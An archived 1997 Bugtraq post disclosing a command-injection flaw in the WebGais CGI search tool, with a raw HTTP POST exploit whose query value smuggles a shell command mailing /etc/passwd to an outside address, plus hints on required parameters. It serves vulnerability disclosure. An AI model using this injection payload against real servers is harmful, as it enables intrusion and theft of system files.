Bugtraq mailing list archives
Vulnerability in WEBgais
From: drazvan () KAPPA RO (Razvan Dragomirescu)
Date: Thu, 10 Jul 1997 19:03:14 +0300
Hi, This one is really short. I'm leaving town tomorrow, so I had no time to "refine" this. It will require a little bit of work from you this time. So here it is: WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "webgais" and does the actual interfacing with the search tool. It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse). So, if we send a query like: query=';mail+foo () somewhere net</etc/passwd;echo'&..... we will trick the "protection" system. The only problem here is that you have to provide a certain combination of input parameters, to reach the vulnerable line in the script. It took me about half an hour to get those parameters right. I also had to comment some code from the script to bypass some error messages, because I do not have the GAIS search tool installed, I only have the WEBGais interface. Of course, you won't have to modify the script at all. It should work just fine as it is. So here's how I exploited this: telnet target.machine.com 80 POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the "exploit" line) query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph ... and it worked. But to make it work for your system too, you'll have to add other parameters, like idx_dir and data_type who are required by the script in its original version. Just make a normal query to your WebGais server and see what all the parameters are. But remember to use "output" and "domain" as specified in my exploit. Otherwise you will end up in some other place of the script and nothing will happen. Again, I'm sorry this is not as documented as you would have expected. I will not be able to provide support for this. I will not have Internet access for about a month. But I'm sure someone will complete this as soon as possible (maybe the guys at SecNet who seemed really interested...). See you all in August. Be good. Razvan -- Razvan Dragomirescu drazvan () kappa ro, drazvan () romania ro, drazvan () roedu net Phone: +40-1-6866621 "Smile, tomorrow will be worse" (Murphy)
Current thread:
- Vulnerability in WEBgais Razvan Dragomirescu (Jul 10)